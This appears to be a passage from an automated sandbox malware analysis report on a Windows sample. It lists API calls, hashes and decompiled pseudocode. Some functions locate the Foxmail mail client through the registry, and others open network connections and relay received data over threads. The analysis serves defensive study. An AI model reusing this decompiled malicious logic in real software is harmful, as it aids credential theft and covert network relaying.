                                                                    • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21988
                                                                    • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21996
                                                                    • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D219A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
                                                                    • String ID: \System32\cmd.exe
                                                                    • API String ID: 2244922440-2003734499
                                                                    • Opcode ID: b3d110efe045345dc61c6ab578f42624d21ef21848a29ef1076897366c8a96cb
                                                                    • Instruction ID: ccbed450807cf45a5f539eef0c8d8e55a7a7b62252c0b2d7d54ac16708b5b207
                                                                    • Opcode Fuzzy Hash: b3d110efe045345dc61c6ab578f42624d21ef21848a29ef1076897366c8a96cb
                                                                    • Instruction Fuzzy Hash: 68014771B803607BF2315674AC06FAB3B9CCBA5B05F100010FB09FA2C0C9A5AC0887E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32 ref: 004043A7
                                                                    • __Init_thread_footer.LIBCMT ref: 004043D2
                                                                      • Part of subcall function 004074B6: RtlEnterCriticalSection.NTDLL(0054C04C), ref: 004074C1
                                                                      • Part of subcall function 004074B6: RtlLeaveCriticalSection.NTDLL(0054C04C), ref: 004074FE
                                                                    • __Init_thread_footer.LIBCMT ref: 00404444
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalInit_thread_footerSection$EnterHeapLeaveProcess
                                                                    • String ID: @*@$p @
                                                                    • API String ID: 3363689876-3210404117
                                                                    • Opcode ID: 6e054b225e5f8cd3501d5ee45ea0ff7e5f34b07e5590dcdb31fc8f303aa08684
                                                                    • Instruction ID: f5f7a7e6d0e508ada8a5e7d71b1f1f1a8fee1ac4979172b9665fec8551eabba9
                                                                    • Opcode Fuzzy Hash: 6e054b225e5f8cd3501d5ee45ea0ff7e5f34b07e5590dcdb31fc8f303aa08684
                                                                    • Instruction Fuzzy Hash: D71151B5904240EAF3109B38AC857C53BA0B72631CF50056AE94D522E2D778A54DAF1B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1CE83 Relevance: 8.8, APIs: 7, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1CE83(void* __ecx) {
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if(__ecx != 0) {
					if( *(__ecx + 0x30) != 0) {
						LocalFree( *(__ecx + 0x30));
					}
					if( *(_t25 + 0x40) != 0) {
						LocalFree( *(_t25 + 0x40));
					}
					if( *(_t25 + 0x48) != 0) {
						LocalFree( *(_t25 + 0x48));
					}
					if( *(_t25 + 0x58) != 0) {
						LocalFree( *(_t25 + 0x58));
					}
					if( *(_t25 + 0x60) != 0) {
						LocalFree( *(_t25 + 0x60));
					}
					if( *(_t25 + 0x68) != 0) {
						LocalFree( *(_t25 + 0x68));
					}
					return LocalFree(_t25);
				}
				return _t13;
			}





                                                                    0x02d1ce84
                                                                    0x02d1ce88
                                                                    0x02d1ce95
                                                                    0x02d1ce9a
                                                                    0x02d1ce9a
                                                                    0x02d1cea0
                                                                    0x02d1cea5
                                                                    0x02d1cea5
                                                                    0x02d1ceab
                                                                    0x02d1ceb0
                                                                    0x02d1ceb0
                                                                    0x02d1ceb6
                                                                    0x02d1cebb
                                                                    0x02d1cebb
                                                                    0x02d1cec1
                                                                    0x02d1cec6
                                                                    0x02d1cec6
                                                                    0x02d1cecc
                                                                    0x02d1ced1
                                                                    0x02d1ced1
                                                                    0x00000000
                                                                    0x02d1ced6
                                                                    0x02d1ced8

                                                                    APIs
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CE9A
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEA5
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEB0
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEBB
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CEC6
                                                                    • LocalFree.KERNEL32(?,00000000,00000000,02D1CAF5), ref: 02D1CED1
                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,02D1CAF5), ref: 02D1CED4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 2826327444-0
                                                                    • Opcode ID: 993c00084aa44e6d3b0742306579e03b7ab6063b42a31713272cedc604495fc4
                                                                    • Instruction ID: b812d6aff7c34262fed6768cc17ad9b80336926648d08e9556fd031dab2b52ce
                                                                    • Opcode Fuzzy Hash: 993c00084aa44e6d3b0742306579e03b7ab6063b42a31713272cedc604495fc4
                                                                    • Instruction Fuzzy Hash: ECF0AF314A0B14ABD7366B25EC04767B6F1BF80319F06083ED58251E708775AC95DF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D19D9A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D19D9A(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x2d297b0,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x2d297b0);
						_t7 = 1;
					}
				}
				return _t7;
			}






                                                                    0x02d19dbd
                                                                    0x02d19df1
                                                                    0x02d19df1
                                                                    0x02d19dbf
                                                                    0x02d19dc2
                                                                    0x02d19de4
                                                                    0x00000000
                                                                    0x02d19de6
                                                                    0x02d19de7
                                                                    0x02d19ded
                                                                    0x02d19ded
                                                                    0x02d19de4
                                                                    0x02d19df5

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 02D19DB5
                                                                    • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,02D297B0,?), ref: 02D19DDC
                                                                    • PathRemoveFileSpecA.SHLWAPI(02D297B0), ref: 02D19DE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileOpenPathQueryRemoveSpecValue
                                                                    • String ID: Executable$software\Aerofox\FoxmailPreview
                                                                    • API String ID: 3687894118-2371247776
                                                                    • Opcode ID: 6b2fcfdc77d11dcaf60e6ba696b4b6ca52ec48efa32019b371ed5bf0321a5b05
                                                                    • Instruction ID: 5a7f912afcbf73e13942a96098bb5c25a96ce2c9978fd8f8742422d804969882
                                                                    • Opcode Fuzzy Hash: 6b2fcfdc77d11dcaf60e6ba696b4b6ca52ec48efa32019b371ed5bf0321a5b05
                                                                    • Instruction Fuzzy Hash: 7FF08274680204BBFB208A51EDAAFDA7BBCEB51B48F110054B901B2384E3B0AD499520
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040753E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,004074DB,00000064), ref: 00407561
                                                                    • RtlLeaveCriticalSection.NTDLL(0054C04C), ref: 0040756B
                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,004074DB,00000064,?,?,?,0040432D,0054BF30,?,004011FD,?,00000000), ref: 0040757C
                                                                    • RtlEnterCriticalSection.NTDLL(0054C04C), ref: 00407583
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID: }@
                                                                    • API String ID: 3269011525-2912179412
                                                                    • Opcode ID: 4ef03699227fb8913ffadc98d663c796d770d6a4634436a0947b56b88775fad1
                                                                    • Instruction ID: aab872f6a7acfef9fd8cb3f6ec7eb454095510407434c627ffe54de3154b5bd8
                                                                    • Opcode Fuzzy Hash: 4ef03699227fb8913ffadc98d663c796d770d6a4634436a0947b56b88775fad1
                                                                    • Instruction Fuzzy Hash: 58E09B31542128F7CB911B94EC0DACF3F14AB45B547044175F90D63160CB79181067CD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404460 Relevance: 7.8, APIs: 5, Instructions: 277COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 71df5b6d05a77e10a09afc9c721d25429cfcaee161e24283a212cd1982d61bbb
                                                                    • Instruction ID: 09d79b86bfc68fc8d8345def38c04372266d8933846edeb707a7e989fdc187ec
                                                                    • Opcode Fuzzy Hash: 71df5b6d05a77e10a09afc9c721d25429cfcaee161e24283a212cd1982d61bbb
                                                                    • Instruction Fuzzy Hash: 8E91E9B16002059BDB20CF64D89076A77F59FD6314F24447FD696A73C1EB7EA842CB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1EF4F Relevance: 7.7, APIs: 5, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 50%
                                                                    			E02D1EF4F(intOrPtr __ecx) {
				char _v5;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				signed int _v36;
				long _v40;
				char _v49;
				char _v52;
				intOrPtr _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v100;
				char _v2156;
				void* _t61;
				char _t64;
				intOrPtr _t70;
				signed int _t77;
				void* _t87;
				void* _t95;
				void* _t99;
				signed int _t100;
				signed int _t102;
				void* _t111;
				signed int _t115;
				void* _t119;
				intOrPtr _t123;
				void* _t133;
				void* _t134;
				void* _t137;

				 *0x2d298b4 = __ecx;
				while(1) {
					_t61 = E02D1F23D( &_v100);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *0x2d29695 == 0) {
						break;
					}
					_t99 = 0xc;
					_v5 = 0;
					_t95 = E02D15F53(_t99);
					if(_t95 == 0) {
						_t95 = 0;
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
					}
					_t100 = _v32;
					_t3 = 0x2d298c0 + _t100 * 0xc; // 0x2d298c0
					_t119 = _t3;
					if( *_t119 != _t100) {
						_t64 = _v5;
					} else {
						_t64 = 1;
						_t95 = _t119;
					}
					if(_t64 != 0) {
						if( *((char*)(_t95 + 4)) != 1) {
							_t130 = _v24;
							__imp__#19( *(_t95 + 8), _v24, _v28, 0);
						} else {
							E02D11052( &_v2156, 0, 0x802);
							_v20 = _v20 & 0;
							_v16 = _v16 & 0;
							_t102 = 8;
							memset( &_v84, 0, _t102 << 2);
							_t137 = _t137 + 0x18;
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_t123 = _v24;
							_t70 =  *((intOrPtr*)(_t123 + 3));
							if(_t70 != 1) {
								if(_t70 != 3) {
									if(_t70 == 4) {
										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802);
										_t77 = E02D1F33C(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
										goto L18;
									}
								} else {
									E02D11052( &_v84, 0, 0x20);
									_v80 = 2;
									_v76 = 1;
									_v72 = 6;
									_t133 = E02D11085(0x200);
									E02D1102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
									_v36 = _v36 & 0x00000000;
									E02D1102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
									_t137 = _t137 + 0x28;
									_t87 =  &_v84;
									__imp__getaddrinfo(_t133, 0, _t87,  &_v20);
									if(_t87 == 0) {
										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff;
										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4;
										goto L12;
									}
								}
							} else {
								_t134 = _t123 + 4;
								__imp__InetNtopW(2, _t134,  &_v2156, 0x802);
								_t115 =  *(_t123 + 8) & 0x0000ffff;
								_t111 = _t134;
								L12:
								_t77 = E02D1F3BD(_t111, _t115);
								L18:
								_v16 = _t77;
							}
							_v52 = 5;
							_v49 = 1;
							E02D1F1DA( &_v52, 0xa, _v32);
							 *(_t95 + 8) = _v16;
							 *((char*)(_t95 + 4)) = 2;
							_v40 = 0;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							CreateThread(0, 0, E02D1F16E, _t95, 0,  &_v40);
							_t130 = _v24;
						}
						E02D11099(_t130);
					} else {
						_v12 = 5;
						E02D1F1DA( &_v12, 2, _t100);
						 *((char*)(_t95 + 4)) = 1;
						 *_t95 = _v32;
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
				}
				return _t61;
			}




































                                                                    0x02d1ef58
                                                                    0x02d1f14a
                                                                    0x02d1f14e
                                                                    0x02d1f160
                                                                    0x02d1f161
                                                                    0x02d1f162
                                                                    0x02d1f163
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1ef68
                                                                    0x02d1ef69
                                                                    0x02d1ef72
                                                                    0x02d1ef76
                                                                    0x02d1ef81
                                                                    0x02d1ef78
                                                                    0x02d1ef7c
                                                                    0x02d1ef7d
                                                                    0x02d1ef7e
                                                                    0x02d1ef7e
                                                                    0x02d1ef83
                                                                    0x02d1ef89
                                                                    0x02d1ef89
                                                                    0x02d1ef91
                                                                    0x02d1ef99
                                                                    0x02d1ef93
                                                                    0x02d1ef93
                                                                    0x02d1ef95
                                                                    0x02d1ef95
                                                                    0x02d1ef9e
                                                                    0x02d1efc9
                                                                    0x02d1f131
                                                                    0x02d1f13d
                                                                    0x02d1efcf
                                                                    0x02d1efdd
                                                                    0x02d1efea
                                                                    0x02d1efed
                                                                    0x02d1eff2
                                                                    0x02d1eff3
                                                                    0x02d1eff3
                                                                    0x02d1eff8
                                                                    0x02d1eff9
                                                                    0x02d1effa
                                                                    0x02d1effc
                                                                    0x02d1efff
                                                                    0x02d1f004
                                                                    0x02d1f030
                                                                    0x02d1f0ba
                                                                    0x02d1f0ce
                                                                    0x02d1f0da
                                                                    0x00000000
                                                                    0x02d1f0da
                                                                    0x02d1f036
                                                                    0x02d1f03e
                                                                    0x02d1f048
                                                                    0x02d1f04f
                                                                    0x02d1f056
                                                                    0x02d1f066
                                                                    0x02d1f06e
                                                                    0x02d1f073
                                                                    0x02d1f084
                                                                    0x02d1f089
                                                                    0x02d1f090
                                                                    0x02d1f097
                                                                    0x02d1f09f
                                                                    0x02d1f0a5
                                                                    0x02d1f0b0
                                                                    0x00000000
                                                                    0x02d1f0b0
                                                                    0x02d1f09f
                                                                    0x02d1f006
                                                                    0x02d1f012
                                                                    0x02d1f018
                                                                    0x02d1f01e
                                                                    0x02d1f022
                                                                    0x02d1f024
                                                                    0x02d1f024
                                                                    0x02d1f0df
                                                                    0x02d1f0df
                                                                    0x02d1f0df
                                                                    0x02d1f0eb
                                                                    0x02d1f0f1
                                                                    0x02d1f0f5
                                                                    0x02d1f104
                                                                    0x02d1f10f
                                                                    0x02d1f116
                                                                    0x02d1f11b
                                                                    0x02d1f123
                                                                    0x02d1f125
                                                                    0x02d1f126
                                                                    0x02d1f12c
                                                                    0x02d1f12c
                                                                    0x02d1f144
                                                                    0x02d1efa0
                                                                    0x02d1efa6
                                                                    0x02d1efac
                                                                    0x02d1efb6
                                                                    0x02d1efba
                                                                    0x02d1efbd
                                                                    0x02d1efbe
                                                                    0x02d1efbf
                                                                    0x02d1efbf
                                                                    0x02d1f149
                                                                    0x02d1f16d

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recv
                                                                    • String ID:
                                                                    • API String ID: 1507349165-0
                                                                    • Opcode ID: c86664b8a3e79898c480d91d957e9ba998ed2d35eb4e6cd06841a52bb7308115
                                                                    • Instruction ID: 16d1df3652896241909326fb77aea3a7e1a7b5b1f9a2bf5d98e8b79432cce1cd
                                                                    • Opcode Fuzzy Hash: c86664b8a3e79898c480d91d957e9ba998ed2d35eb4e6cd06841a52bb7308115
                                                                    • Instruction Fuzzy Hash: B461D572D44218BEEB10CFA4E845BEEB7B9FF04300F158059E944AB781D7B5AD49CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004114C8 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0040E77F,00000000,?,?,00000000,00000000,0040E77F,?,00000000,?,0040E77F,00000001,?,?,00000001,0040E77F), ref: 00411510
                                                                    • __alloca_probe_16.LIBCMT ref: 00411539
                                                                    • MultiByteToWideChar.KERNEL32(0040E77F,00000001,?,?,00000000,?), ref: 00411585
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040D49E), ref: 00411597
                                                                    • __freea.LIBCMT ref: 004115A0
                                                                      • Part of subcall function 0040DD7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 0040DDAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                    • String ID:
                                                                    • API String ID: 313313983-0
                                                                    • Opcode ID: 3246cc23d97c087d84055473fece610c31b770d29c33b2c316651a19d1730add
                                                                    • Instruction ID: 05ac2beabbc3f6f9b50eb319e2aa142b7ab290b7d392ed1820b185fa7d947a0d
                                                                    • Opcode Fuzzy Hash: 3246cc23d97c087d84055473fece610c31b770d29c33b2c316651a19d1730add
                                                                    • Instruction Fuzzy Hash: B431067190020ABBDB209F65DC40DEF7BBAEF84710F05416AFA05A7261D7388D91CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1EE9A Relevance: 7.6, APIs: 5, Instructions: 70networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 02D1EEB4
                                                                    • gethostbyname.WS2_32(?), ref: 02D1EEBD
                                                                    • htons.WS2_32(?), ref: 02D1EEE1
                                                                    • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 02D1EF12
                                                                    • connect.WS2_32(00000000,?,00000010), ref: 02D1EF2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InetNtopconnectgethostbynamehtonssocket
                                                                    • String ID:
                                                                    • API String ID: 2393792429-0
                                                                    • Opcode ID: 1058f91352ab9e601b44e465007be6a5670c454b5295a4bbb1c7b61333a145ed
                                                                    • Instruction ID: 17a31c87c7d1ac37814cb36101f7000bb2473a472d03726e458727269bdaedd1
                                                                    • Opcode Fuzzy Hash: 1058f91352ab9e601b44e465007be6a5670c454b5295a4bbb1c7b61333a145ed
                                                                    • Instruction Fuzzy Hash: 7111D672D40254BBE72097A4BC49FAB77ECEF15321F114865FD49D7281D6708D5887A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004108AE Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004108B7
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004108DA
                                                                      • Part of subcall function 0040DD7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 0040DDAC
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00410900
                                                                    • _free.LIBCMT ref: 00410913
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00410922
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 0af92fc74c162632bf3be315d882d9b83aa6ea7ca49924c7f1816ffeebf3793e
                                                                    • Instruction ID: 34f974fb90905a2613f20b0ada7862a26b38e47aeb372a8b299f5cfaed8f77de
                                                                    • Opcode Fuzzy Hash: 0af92fc74c162632bf3be315d882d9b83aa6ea7ca49924c7f1816ffeebf3793e
                                                                    • Instruction Fuzzy Hash: A401B5B27116197B732126B75C98CBB6A6DDEC6B60315012EB904C7202DFB88D8281B8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

